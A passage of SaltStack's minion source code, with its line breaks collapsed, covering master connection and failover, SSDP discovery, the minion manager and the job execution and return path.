connection with Master ' '%s: check ownership/permissions. Error ' 'message: %s', opts['master'], exc ) else: msg = ('Master %s could not be reached, trying next ' 'next master (if any)', opts['master']) log.info(msg) continue if not conn: if attempts == tries: # Exhausted all attempts. Return exception. self.connected = False self.opts['master'] = copy.copy(self.opts['local_masters']) log.error( 'No master could be reached or all masters ' 'denied the minion\'s connection attempt.' ) # If the code reaches this point, 'last_exc' # should already be set. raise last_exc # pylint: disable=E0702 else: self.tok = pub_channel.auth.gen_token(b'salt') self.connected = True raise tornado.gen.Return((opts['master'], pub_channel)) # single master sign in else: if opts['random_master']: log.warning('random_master is True but there is only one master specified. Ignoring.') while True: if attempts != 0: # Give up a little time between connection attempts # to allow the IOLoop to run any other scheduled tasks. yield tornado.gen.sleep(opts['acceptance_wait_time']) attempts += 1 if tries > 0: log.debug( 'Connecting to master. Attempt %s of %s', attempts, tries ) else: log.debug( 'Connecting to master. Attempt %s (infinite attempts)', attempts ) opts.update(prep_ip_port(opts)) opts.update(resolve_dns(opts)) try: if self.opts['transport'] == 'detect': self.opts['detect_mode'] = True for trans in ('zeromq', 'tcp'): if trans == 'zeromq' and not zmq: continue self.opts['transport'] = trans pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs) yield pub_channel.connect() if not pub_channel.auth.authenticated: continue del self.opts['detect_mode'] break else: pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs) yield pub_channel.connect() self.tok = pub_channel.auth.gen_token(b'salt') self.connected = True raise tornado.gen.Return((opts['master'], pub_channel)) except SaltClientError as exc: if attempts == tries: # Exhausted all attempts. Return exception. self.connected = False raise exc def _discover_masters(self): ''' Discover master(s) and decide where to connect, if SSDP is around. This modifies the configuration on the fly. :return: ''' if self.opts['master'] == DEFAULT_MINION_OPTS['master'] and self.opts['discovery'] is not False: master_discovery_client = salt.utils.ssdp.SSDPDiscoveryClient() masters = {} for att in range(self.opts['discovery'].get('attempts', 3)): try: att += 1 log.info('Attempting %s time(s) to discover masters', att) masters.update(master_discovery_client.discover()) if not masters: time.sleep(self.opts['discovery'].get('pause', 5)) else: break except Exception as err: log.error('SSDP discovery failure: %s', err) break if masters: policy = self.opts.get('discovery', {}).get('match', 'any') if policy not in ['any', 'all']: log.error('SSDP configuration matcher failure: unknown value "%s". ' 'Should be "any" or "all"', policy) return mapping = self.opts['discovery'].get('mapping', {}) discovered = [] for addr, mappings in masters.items(): for proto_data in mappings: cnt = len([key for key, value in mapping.items() if proto_data.get('mapping', {}).get(key) == value]) if policy == 'any' and bool(cnt) or cnt == len(mapping): if self.opts['discovery'].get('multimaster'): discovered.append(proto_data['master']) else: self.opts['master'] = proto_data['master'] return self.opts['master'] = discovered def _return_retry_timer(self): ''' Based on the minion configuration, either return a randomized timer or just return the value of the return_retry_timer. ''' msg = 'Minion return retry timer set to %s seconds' if self.opts.get('return_retry_timer_max'): try: random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max']) retry_msg = msg % random_retry log.debug('%s (randomized)', msg % random_retry) return random_retry except ValueError: # Catch wiseguys using negative integers here log.error( 'Invalid value (return_retry_timer: %s or ' 'return_retry_timer_max: %s). Both must be positive ' 'integers.', self.opts['return_retry_timer'], self.opts['return_retry_timer_max'], ) log.debug(msg, DEFAULT_MINION_OPTS['return_retry_timer']) return DEFAULT_MINION_OPTS['return_retry_timer'] else: log.debug(msg, self.opts.get('return_retry_timer')) return self.opts.get('return_retry_timer') class SMinion(MinionBase): ''' Create an object that has loaded all of the minion module functions, grains, modules, returners etc. The SMinion allows developers to generate all of the salt minion functions and present them with these functions for general use. ''' def __init__(self, opts): # Late setup of the opts grains, so we can log from the grains module import salt.loader opts['grains'] = salt.loader.grains(opts) super(SMinion, self).__init__(opts) # run ssdp discovery if necessary self._discover_masters() # Clean out the proc directory (default /var/cache/salt/minion/proc) if (self.opts.get('file_client', 'remote') == 'remote' or self.opts.get('use_master_when_local', False)): install_zmq() io_loop = ZMQDefaultLoop.current() io_loop.run_sync( lambda: self.eval_master(self.opts, failed=True) ) self.gen_modules(initial_load=True) # If configured, cache pillar data on the minion if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False): import salt.utils.yaml pdir = os.path.join(self.opts['cachedir'], 'pillar') if not os.path.isdir(pdir): os.makedirs(pdir, 0o700) ptop = os.path.join(pdir, 'top.sls') if self.opts['saltenv'] is not None: penv = self.opts['saltenv'] else: penv = 'base' cache_top = {penv: {self.opts['id']: ['cache']}} with salt.utils.files.fopen(ptop, 'wb') as fp_: salt.utils.yaml.safe_dump(cache_top, fp_) os.chmod(ptop, 0o600) cache_sls = os.path.join(pdir, 'cache.sls') with salt.utils.files.fopen(cache_sls, 'wb') as fp_: salt.utils.yaml.safe_dump(self.opts['pillar'], fp_) os.chmod(cache_sls, 0o600) def gen_modules(self, initial_load=False): ''' Tell the minion to reload the execution modules CLI Example: .. code-block:: bash salt '*' sys.reload_modules ''' self.opts['pillar'] = salt.pillar.get_pillar( self.opts, self.opts['grains'], self.opts['id'], self.opts['saltenv'], pillarenv=self.opts.get('pillarenv'), ).compile_pillar() self.utils = salt.loader.utils(self.opts) self.functions = salt.loader.minion_mods(self.opts, utils=self.utils) self.serializers = salt.loader.serializers(self.opts) self.returners = salt.loader.returners(self.opts, self.functions) self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None) # TODO: remove self.function_errors = {} # Keep the funcs clean self.states = salt.loader.states(self.opts, self.functions, self.utils, self.serializers) self.rend = salt.loader.render(self.opts, self.functions) # self.matcher = Matcher(self.opts, self.functions) self.matchers = salt.loader.matchers(self.opts) self.functions['sys.reload_modules'] = self.gen_modules self.executors = salt.loader.executors(self.opts) class MasterMinion(object): ''' Create a fully loaded minion function object for generic use on the master. What makes this class different is that the pillar is omitted, otherwise everything else is loaded cleanly. ''' def __init__( self, opts, returners=True, states=True, rend=True, matcher=True, whitelist=None, ignore_config_errors=True): self.opts = salt.config.minion_config( opts['conf_file'], ignore_config_errors=ignore_config_errors, role='master' ) self.opts.update(opts) self.whitelist = whitelist self.opts['grains'] = salt.loader.grains(opts) self.opts['pillar'] = {} self.mk_returners = returners self.mk_states = states self.mk_rend = rend self.mk_matcher = matcher self.gen_modules(initial_load=True) def gen_modules(self, initial_load=False): ''' Tell the minion to reload the execution modules CLI Example: .. code-block:: bash salt '*' sys.reload_modules ''' self.utils = salt.loader.utils(self.opts) self.functions = salt.loader.minion_mods( self.opts, utils=self.utils, whitelist=self.whitelist, initial_load=initial_load) self.serializers = salt.loader.serializers(self.opts) if self.mk_returners: self.returners = salt.loader.returners(self.opts, self.functions) if self.mk_states: self.states = salt.loader.states(self.opts, self.functions, self.utils, self.serializers) if self.mk_rend: self.rend = salt.loader.render(self.opts, self.functions) if self.mk_matcher: self.matchers = salt.loader.matchers(self.opts) self.functions['sys.reload_modules'] = self.gen_modules class MinionManager(MinionBase): ''' Create a multi minion interface, this creates as many minions as are defined in the master option and binds each minion object to a respective master. ''' def __init__(self, opts): super(MinionManager, self).__init__(opts) self.auth_wait = self.opts['acceptance_wait_time'] self.max_auth_wait = self.opts['acceptance_wait_time_max'] self.minions = [] self.jid_queue = [] install_zmq() self.io_loop = ZMQDefaultLoop.current() self.process_manager = ProcessManager(name='MultiMinionProcessManager') self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True}) # Tornado backward compat def __del__(self): self.destroy() def _bind(self): # start up the event publisher, so we can see events during startup self.event_publisher = salt.utils.event.AsyncEventPublisher( self.opts, io_loop=self.io_loop, ) self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop) self.event.subscribe('') self.event.set_event_handler(self.handle_event) @tornado.gen.coroutine def handle_event(self, package): yield [minion.handle_event(package) for minion in self.minions] def _create_minion_object(self, opts, timeout, safe, io_loop=None, loaded_base_name=None, jid_queue=None): ''' Helper function to return the correct type of object ''' return Minion(opts, timeout, safe, io_loop=io_loop, loaded_base_name=loaded_base_name, jid_queue=jid_queue) def _check_minions(self): ''' Check the size of self.minions and raise an error if it's empty ''' if not self.minions: err = ('Minion unable to successfully connect to ' 'a Salt Master.') log.error(err) def _spawn_minions(self, timeout=60): ''' Spawn all the coroutines which will sign in to masters ''' # Run masters discovery over SSDP. This may modify the whole configuration, # depending of the networking and sets of masters. If match is 'any' we let # eval_master handle the discovery instead so disconnections can also handle # discovery if isinstance(self.opts['discovery'], dict) and self.opts['discovery'].get('multimaster'): self._discover_masters() masters = self.opts['master'] if (self.opts['master_type'] in ('failover', 'distributed')) or not isinstance(self.opts['master'], list): masters = [masters] for master in masters: s_opts = copy.deepcopy(self.opts) s_opts['master'] = master s_opts['multimaster'] = True minion = self._create_minion_object(s_opts, s_opts['auth_timeout'], False, io_loop=self.io_loop, loaded_base_name='salt.loader.{0}'.format(s_opts['master']), jid_queue=self.jid_queue) self.io_loop.spawn_callback(self._connect_minion, minion) self.io_loop.call_later(timeout, self._check_minions) @tornado.gen.coroutine def _connect_minion(self, minion): ''' Create a minion, and asynchronously connect it to a master ''' auth_wait = minion.opts['acceptance_wait_time'] failed = False while True: if failed: if auth_wait < self.max_auth_wait: auth_wait += self.auth_wait log.debug( "sleeping before reconnect attempt to %s [%d/%d]", minion.opts['master'], auth_wait, self.max_auth_wait, ) yield tornado.gen.sleep(auth_wait) # TODO: log? try: if minion.opts.get('beacons_before_connect', False): minion.setup_beacons(before_connect=True) if minion.opts.get('scheduler_before_connect', False): minion.setup_scheduler(before_connect=True) yield minion.connect_master(failed=failed) minion.tune_in(start=False) self.minions.append(minion) break except SaltClientError as exc: failed = True log.error( 'Error while bringing up minion for multi-master. Is ' 'master at %s responding?', minion.opts['master'] ) except SaltMasterUnresolvableError: err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \ 'Set \'master\' value in minion config.'.format(minion.opts['master']) log.error(err) break except Exception as e: failed = True log.critical( 'Unexpected error while connecting to %s', minion.opts['master'], exc_info=True ) # Multi Master Tune In def tune_in(self): ''' Bind to the masters This loop will attempt to create connections to masters it hasn't connected to yet, but once the initial connection is made it is up to ZMQ to do the reconnect (don't know of an API to get the state here in salt) ''' self._bind() # Fire off all the minion coroutines self._spawn_minions() # serve forever! self.io_loop.start() @property def restart(self): for minion in self.minions: if minion.restart: return True return False def stop(self, signum): for minion in self.minions: minion.process_manager.stop_restarting() minion.process_manager.send_signal_to_processes(signum) # kill any remaining processes minion.process_manager.kill_children() minion.destroy() def destroy(self): for minion in self.minions: minion.destroy() class Minion(MinionBase): ''' This class instantiates a minion, runs connections for a minion, and loads all of the functions into the minion ''' def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231 ''' Pass in the options dict ''' # this means that the parent class doesn't know *which* master we connect to super(Minion, self).__init__(opts) self.timeout = timeout self.safe = safe self._running = None self.win_proc = [] self.loaded_base_name = loaded_base_name self.connected = False self.restart = False # Flag meaning minion has finished initialization including first connect to the master. # True means the Minion is fully functional and ready to handle events. self.ready = False self.jid_queue = [] if jid_queue is None else jid_queue self.periodic_callbacks = {} if io_loop is None: install_zmq() self.io_loop = ZMQDefaultLoop.current() else: self.io_loop = io_loop # Warn if ZMQ < 3.2 if zmq: if ZMQ_VERSION_INFO < (3, 2): log.warning( 'You have a version of ZMQ less than ZMQ 3.2! There are ' 'known connection keep-alive issues with ZMQ < 3.2 which ' 'may result in loss of contact with minions. Please ' 'upgrade your ZMQ!' ) # Late setup of the opts grains, so we can log from the grains # module. If this is a proxy, however, we need to init the proxymodule # before we can get the grains. We do this for proxies in the # post_master_init if not salt.utils.platform.is_proxy(): self.opts['grains'] = salt.loader.grains(opts) else: if self.opts.get('beacons_before_connect', False): log.warning( '\'beacons_before_connect\' is not supported ' 'for proxy minions. Setting to False' ) self.opts['beacons_before_connect'] = False if self.opts.get('scheduler_before_connect', False): log.warning( '\'scheduler_before_connect\' is not supported ' 'for proxy minions. Setting to False' ) self.opts['scheduler_before_connect'] = False log.info('Creating minion process manager') if self.opts['random_startup_delay']: sleep_time = random.randint(0, self.opts['random_startup_delay']) log.info( 'Minion sleeping for %s seconds due to configured ' 'startup_delay between 0 and %s seconds', sleep_time, self.opts['random_startup_delay'] ) time.sleep(sleep_time) self.process_manager = ProcessManager(name='MinionProcessManager') self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True}) # We don't have the proxy setup yet, so we can't start engines # Engines need to be able to access __proxy__ if not salt.utils.platform.is_proxy(): self.io_loop.spawn_callback(salt.engines.start_engines, self.opts, self.process_manager) # Install the SIGINT/SIGTERM handlers if not done so far if signal.getsignal(signal.SIGINT) is signal.SIG_DFL: # No custom signal handling was added, install our own signal.signal(signal.SIGINT, self._handle_signals) if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL: # No custom signal handling was added, install our own signal.signal(signal.SIGTERM, self._handle_signals) def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument self._running = False # escalate the signals to the process manager self.process_manager.stop_restarting() self.process_manager.send_signal_to_processes(signum) # kill any remaining processes self.process_manager.kill_children() time.sleep(1) sys.exit(0) def sync_connect_master(self, timeout=None, failed=False): ''' Block until we are connected to a master ''' self._sync_connect_master_success = False log.debug("sync_connect_master") def on_connect_master_future_done(future): self._sync_connect_master_success = True self.io_loop.stop() self._connect_master_future = self.connect_master(failed=failed) # finish connecting to master self._connect_master_future.add_done_callback(on_connect_master_future_done) if timeout: self.io_loop.call_later(timeout, self.io_loop.stop) try: self.io_loop.start() except KeyboardInterrupt: self.destroy() # I made the following 3 line oddity to preserve traceback. # Please read PR #23978 before changing, hopefully avoiding regressions. # Good luck, we're all counting on you. Thanks. if self._connect_master_future.done(): future_exception = self._connect_master_future.exception() if future_exception: # This needs to be re-raised to preserve restart_on_error behavior. raise six.reraise(*future_exception) if timeout and self._sync_connect_master_success is False: raise SaltDaemonNotRunning('Failed to connect to the salt-master') @tornado.gen.coroutine def connect_master(self, failed=False): ''' Return a future which will complete when you are connected to a master ''' master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe, failed) yield self._post_master_init(master) # TODO: better name... @tornado.gen.coroutine def _post_master_init(self, master): ''' Function to finish init after connecting to a master This is primarily loading modules, pillars, etc. (since they need to know which master they connected to) If this function is changed, please check ProxyMinion._post_master_init to see if those changes need to be propagated. Minions and ProxyMinions need significantly different post master setups, which is why the differences are not factored out into separate helper functions. ''' if self.connected: self.opts['master'] = master # Initialize pillar before loader to make pillar accessible in modules async_pillar = salt.pillar.get_async_pillar( self.opts, self.opts['grains'], self.opts['id'], self.opts['saltenv'], pillarenv=self.opts.get('pillarenv') ) self.opts['pillar'] = yield async_pillar.compile_pillar() async_pillar.destroy() if not self.ready: self._setup_core() elif self.connected and self.opts['pillar']: # The pillar has changed due to the connection to the master. # Reload the functions so that they can use the new pillar data. self.functions, self.returners, self.function_errors, self.executors = self._load_modules() if hasattr(self, 'schedule'): self.schedule.functions = self.functions self.schedule.returners = self.returners if not hasattr(self, 'schedule'): self.schedule = salt.utils.schedule.Schedule( self.opts, self.functions, self.returners, cleanup=[master_event(type='alive')]) # add default scheduling jobs to the minions scheduler if self.opts['mine_enabled'] and 'mine.update' in self.functions: self.schedule.add_job({ '__mine_interval': { 'function': 'mine.update', 'minutes': self.opts['mine_interval'], 'jid_include': True, 'maxrunning': 2, 'run_on_start': True, 'return_job': self.opts.get('mine_return_job', False) } }, persist=True) log.info('Added mine.update to scheduler') else: self.schedule.delete_job('__mine_interval', persist=True) # add master_alive job if enabled if (self.opts['transport'] != 'tcp' and self.opts['master_alive_interval'] > 0 and self.connected): self.schedule.add_job({ master_event(type='alive', master=self.opts['master']): { 'function': 'status.master', 'seconds': self.opts['master_alive_interval'], 'jid_include': True, 'maxrunning': 1, 'return_job': False, 'kwargs': {'master': self.opts['master'], 'connected': True} } }, persist=True) if self.opts['master_failback'] and \ 'master_list' in self.opts and \ self.opts['master'] != self.opts['master_list'][0]: self.schedule.add_job({ master_event(type='failback'): { 'function': 'status.ping_master', 'seconds': self.opts['master_failback_interval'], 'jid_include': True, 'maxrunning': 1, 'return_job': False, 'kwargs': {'master': self.opts['master_list'][0]} } }, persist=True) else: self.schedule.delete_job(master_event(type='failback'), persist=True) else: self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True) self.schedule.delete_job(master_event(type='failback'), persist=True) def _prep_mod_opts(self): ''' Returns a copy of the opts with key bits stripped out ''' mod_opts = {} for key, val in six.iteritems(self.opts): if key == 'logger': continue mod_opts[key] = val return mod_opts def _load_modules(self, force_refresh=False, notify=False, grains=None, opts=None): ''' Return the functions and the returners loaded up from the loader module ''' opt_in = True if not opts: opts = self.opts opt_in = False # if this is a *nix system AND modules_max_memory is set, lets enforce # a memory limit on module imports # this feature ONLY works on *nix like OSs (resource module doesn't work on windows) modules_max_memory = False if opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE: log.debug( 'modules_max_memory set, enforcing a maximum of %s', opts['modules_max_memory'] ) modules_max_memory = True old_mem_limit = resource.getrlimit(resource.RLIMIT_AS) rss, vms = psutil.Process(os.getpid()).memory_info()[:2] mem_limit = rss + vms + opts['modules_max_memory'] resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit)) elif opts.get('modules_max_memory', -1) > 0: if not HAS_PSUTIL: log.error('Unable to enforce modules_max_memory because psutil is missing') if not HAS_RESOURCE: log.error('Unable to enforce modules_max_memory because resource is missing') # This might be a proxy minion if hasattr(self, 'proxy'): proxy = self.proxy else: proxy = None if grains is None: opts['grains'] = salt.loader.grains(opts, force_refresh, proxy=proxy) self.utils = salt.loader.utils(opts, proxy=proxy) if opts.get('multimaster', False): s_opts = copy.deepcopy(opts) functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy, loaded_base_name=self.loaded_base_name, notify=notify) else: functions = salt.loader.minion_mods(opts, utils=self.utils, notify=notify, proxy=proxy) returners = salt.loader.returners(opts, functions, proxy=proxy) errors = {} if '_errors' in functions: errors = functions['_errors'] functions.pop('_errors') # we're done, reset the limits! if modules_max_memory is True: resource.setrlimit(resource.RLIMIT_AS, old_mem_limit) executors = salt.loader.executors(opts, functions, proxy=proxy) if opt_in: self.opts = opts return functions, returners, errors, executors def _send_req_sync(self, load, timeout): if self.opts['minion_sign_messages']: log.trace('Signing event to be published onto the bus.') minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem') sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load)) load['sig'] = sig channel = salt.transport.client.ReqChannel.factory(self.opts) try: return channel.send(load, timeout=timeout) finally: channel.close() @tornado.gen.coroutine def _send_req_async(self, load, timeout): if self.opts['minion_sign_messages']: log.trace('Signing event to be published onto the bus.') minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem') sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load)) load['sig'] = sig channel = salt.transport.client.AsyncReqChannel.factory(self.opts) try: ret = yield channel.send(load, timeout=timeout) raise tornado.gen.Return(ret) finally: channel.close() def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True, timeout_handler=None): ''' Fire an event on the master, or drop message if unable to send. ''' load = {'id': self.opts['id'], 'cmd': '_minion_event', 'pretag': pretag, 'tok': self.tok} if events: load['events'] = events elif data and tag: load['data'] = data load['tag'] = tag elif not data and tag: load['data'] = {} load['tag'] = tag else: return if sync: try: self._send_req_sync(load, timeout) except salt.exceptions.SaltReqTimeoutError: log.info('fire_master failed: master could not be contacted. Request timed out.') # very likely one of the masters is dead, status.master will flush it self.functions['status.master'](self.opts['master']) return False except Exception: log.info('fire_master failed: %s', traceback.format_exc()) return False else: if timeout_handler is None: def handle_timeout(*_): log.info('fire_master failed: master could not be contacted. Request timed out.') # very likely one of the masters is dead, status.master will flush it self.functions['status.master'](self.opts['master']) return True timeout_handler = handle_timeout with tornado.stack_context.ExceptionStackContext(timeout_handler): self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg return True @tornado.gen.coroutine def _handle_decoded_payload(self, data): ''' Override this method if you wish to handle the decoded data differently. ''' # Ensure payload is unicode. Disregard failure to decode binary blobs. if six.PY2: data = salt.utils.data.decode(data, keep=True) if 'user' in data: log.info( 'User %s Executing command %s with jid %s', data['user'], data['fun'], data['jid'] ) else: log.info( 'Executing command %s with jid %s', data['fun'], data['jid'] ) log.debug('Command details %s', data) # Don't duplicate jobs log.trace('Started JIDs: %s', self.jid_queue) if self.jid_queue is not None: if data['jid'] in self.jid_queue: return else: self.jid_queue.append(data['jid']) if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']: self.jid_queue.pop(0) if isinstance(data['fun'], six.string_types): if data['fun'] == 'sys.reload_modules': self.functions, self.returners, self.function_errors, self.executors = self._load_modules() self.schedule.functions = self.functions self.schedule.returners = self.returners process_count_max = self.opts.get('process_count_max') if process_count_max > 0: process_count = len(salt.utils.minion.running(self.opts)) while process_count >= process_count_max: log.warning("Maximum number of processes reached while executing jid %s, waiting...", data['jid']) yield tornado.gen.sleep(10) process_count = len(salt.utils.minion.running(self.opts)) # We stash an instance references to allow for the socket # communication in Windows. You can't pickle functions, and thus # python needs to be able to reconstruct the reference on the other # side. instance = self multiprocessing_enabled = self.opts.get('multiprocessing', True) if multiprocessing_enabled: if sys.platform.startswith('win'): # let python reconstruct the minion on the other side if we're # running on windows instance = None with default_signals(signal.SIGINT, signal.SIGTERM): process = SignalHandlingMultiprocessingProcess( target=self._target, args=(instance, self.opts, data, self.connected) ) else: process = threading.Thread( target=self._target, args=(instance, self.opts, data, self.connected), name=data['jid'] ) if multiprocessing_enabled: with default_signals(signal.SIGINT, signal.SIGTERM): # Reset current signals before starting the process in # order not to inherit the current signal handlers process.start() else: process.start() # TODO: remove the windows specific check? if multiprocessing_enabled and not salt.utils.platform.is_windows(): # we only want to join() immediately if we are daemonizing a process process.join() else: self.win_proc.append(process) def ctx(self): ''' Return a single context manager for the minion's data ''' if six.PY2: return contextlib.nested( self.functions.context_dict.clone(), self.returners.context_dict.clone(), self.executors.context_dict.clone(), ) else: exitstack = contextlib.ExitStack() exitstack.enter_context(self.functions.context_dict.clone()) exitstack.enter_context(self.returners.context_dict.clone()) exitstack.enter_context(self.executors.context_dict.clone()) return exitstack @classmethod def _target(cls, minion_instance, opts, data, connected): if not minion_instance: minion_instance = cls(opts) minion_instance.connected = connected if not hasattr(minion_instance, 'functions'): functions, returners, function_errors, executors = ( minion_instance._load_modules(grains=opts['grains']) ) minion_instance.functions = functions minion_instance.returners = returners minion_instance.function_errors = function_errors minion_instance.executors = executors if not hasattr(minion_instance, 'serial'): minion_instance.serial = salt.payload.Serial(opts) if not hasattr(minion_instance, 'proc_dir'): uid = salt.utils.user.get_uid(user=opts.get('user', None)) minion_instance.proc_dir = ( get_proc_dir(opts['cachedir'], uid=uid) ) def run_func(minion_instance, opts, data): if isinstance(data['fun'], tuple) or isinstance(data['fun'], list): return Minion._thread_multi_return(minion_instance, opts, data) else: return Minion._thread_return(minion_instance, opts, data) with tornado.stack_context.StackContext(functools.partial(RequestContext, {'data': data, 'opts': opts})): with tornado.stack_context.StackContext(minion_instance.ctx): run_func(minion_instance, opts, data) @classmethod def _thread_return(cls, minion_instance, opts, data): ''' This method should be used as a threading target, start the actual minion side execution. ''' fn_ = os.path.join(minion_instance.proc_dir, data['jid']) if opts['multiprocessing'] and not salt.utils.platform.is_windows(): # Shutdown the multiprocessing before daemonizing salt.log.setup.shutdown_multiprocessing_logging() salt.utils.process.daemonize_if(opts) # Reconfigure multiprocessing logging after daemonizing salt.log.setup.setup_multiprocessing_logging() salt.utils.process.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid'])) sdata = {'pid': os.getpid()} sdata.update(data) log.info('Starting a new job %s with PID %s', data['jid'], sdata['pid']) with salt.utils.files.fopen(fn_, 'w+b') as fp_: fp_.write(minion_instance.serial.dumps(sdata)) ret = {'success': False} function_name = data['fun'] executors = data.get('module_executors') or \ getattr(minion_instance, 'module_executors', []) or \ opts.get('module_executors', ['direct_call']) allow_missing_funcs = any([ minion_instance.executors['{0}.allow_missing_func'.format(executor)](function_name) for executor in executors if '{0}.allow_missing_func' in minion_instance.executors ]) if function_name in minion_instance.functions or allow_missing_funcs is True: try: minion_blackout_violation = False if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False): whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', []) # this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist: minion_blackout_violation = True # use minion_blackout_whitelist from grains if it exists if minion_instance.opts['grains'].get('minion_blackout', False): whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', []) if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist: minion_blackout_violation = True if minion_blackout_violation: raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' ' 'to False in pillar or grains to resume operations. Only ' 'saltutil.refresh_pillar allowed in blackout mode.') if function_name in minion_instance.functions: func = minion_instance.functions[function_name] args, kwargs = load_args_and_kwargs( func, data['arg'], data) else: # only run if function_name is not in minion_instance.functions and allow_missing_funcs is True func = function_name args, kwargs = data['arg'], data minion_instance.functions.pack['__context__']['retcode'] = 0 if isinstance(executors, six.string_types): executors = [executors] elif not isinstance(executors, list) or not executors: raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected". format(executors)) if opts.get('sudo_user', '') and executors[-1] != 'sudo': executors[-1] = 'sudo' # replace the last one with sudo log.trace('Executors list %s', executors) # pylint: disable=no-member for name in executors: fname = '{0}.execute'.format(name) if fname not in minion_instance.executors: raise SaltInvocationError("Executor '{0}' is not available".format(name)) return_data = minion_instance.executors[fname](opts, data, func, args, kwargs) if return_data is not None: break if isinstance(return_data, types.GeneratorType): ind = 0 iret = {} for single in return_data: if isinstance(single, dict) and isinstance(iret, dict): iret.update(single) else: if not iret: iret = [] iret.append(single) tag = tagify([data['jid'], 'prog', opts['id'], six.text_type(ind)], 'job') event_data = {'return': single} minion_instance._fire_master(event_data, tag) ind += 1 ret['return'] = iret else: ret['return'] = return_data retcode = minion_instance.functions.pack['__context__'].get( 'retcode', salt.defaults.exitcodes.EX_OK ) if retcode == salt.defaults.exitcodes.EX_OK: # No nonzero retcode in __context__ dunder. Check if return # is a dictionary with a "result" or "success" key. try: func_result = all(return_data.get(x, True) for x in ('result', 'success')) except Exception: # return data is not a dict func_result = True if not func_result: retcode = salt.defaults.exitcodes.EX_GENERIC ret['retcode'] = retcode ret['success'] = retcode == salt.defaults.exitcodes.EX_OK except CommandNotFoundError as exc: msg = 'Command required for \'{0}\' not found'.format( function_name ) log.debug(msg, exc_info=True) ret['return'] = '{0}: {1}'.format(msg, exc) ret['out'] = 'nested' ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC except CommandExecutionError as exc: log.error( 'A command in \'%s\' had a problem: %s', function_name, exc, exc_info_on_loglevel=logging.DEBUG ) ret['return'] = 'ERROR: {0}'.format(exc) ret['out'] = 'nested' ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC except SaltInvocationError as exc: log.error( 'Problem executing \'%s\': %s', function_name, exc, exc_info_on_loglevel=logging.DEBUG ) ret['return'] = 'ERROR executing \'{0}\': {1}'.format( function_name, exc ) ret['out'] = 'nested' ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC except TypeError as exc: msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format( function_name, exc, func.__doc__ or '' ) log.warning(msg, exc_info_on_loglevel=logging.DEBUG) ret['return'] = msg ret['out'] = 'nested' ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC except Exception: msg = 'The minion function caused an exception' log.warning(msg, exc_info_on_loglevel=True) salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data) ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc()) ret['out'] = 'nested' ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC else: docs = minion_instance.functions['sys.doc']('{0}*'.format(function_name)) if docs: docs[function_name] = minion_instance.functions.missing_fun_string(function_name) ret['return'] = docs else: ret['return'] = minion_instance.functions.missing_fun_string(function_name) mod_name = function_name.split('.')[0] if mod_name in minion_instance.function_errors: ret['return'] += ' Possible reasons: \'{0}\''.format( minion_instance.function_errors[mod_name] ) ret['success'] = False ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC ret['out'] = 'nested' ret['jid'] = data['jid'] ret['fun'] = data['fun'] ret['fun_args'] = data['arg'] if 'master_id' in data: ret['master_id'] = data['master_id'] if 'metadata' in data: if isinstance(data['metadata'], dict): ret['metadata'] = data['metadata'] else: log.warning('The metadata parameter must be a dictionary. Ignoring.') if minion_instance.connected: minion_instance._return_pub( ret, timeout=minion_instance._return_retry_timer() ) # Add default returners from minion config # Should have been coverted to comma-delimited string already if isinstance(opts.get('return'), six.string_types): if data['ret']: data['ret'] = ','.join((data['ret'], opts['return'])) else: data['ret'] = opts['return'] log.debug('minion return: %s', ret) # TODO: make a list? Seems odd to split it this late :/ if data['ret'] and isinstance(data['ret'], six.string_types): if 'ret_config' in data: ret['ret_config'] = data['ret_config'] if 'ret_kwargs' in data: ret['ret_kwargs'] = data['ret_kwargs'] ret['id'] = opts['id'] for returner in set(data['ret'].split(',')): try: returner_str = '{0}.returner'.format(returner) if returner_str in minion_instance.returners: minion_instance.returners[returner_str](ret) else: returner_err = minion_instance.returners.missing_fun_string(returner_str) log.error( 'Returner %s could not be loaded: %s', returner_str, returner_err ) except Exception as exc: log.exception( 'The return failed for job %s: %s', data['jid'], exc ) @classmethod def _thread_multi_return(cls, minion_instance, opts, data): ''' This method should be 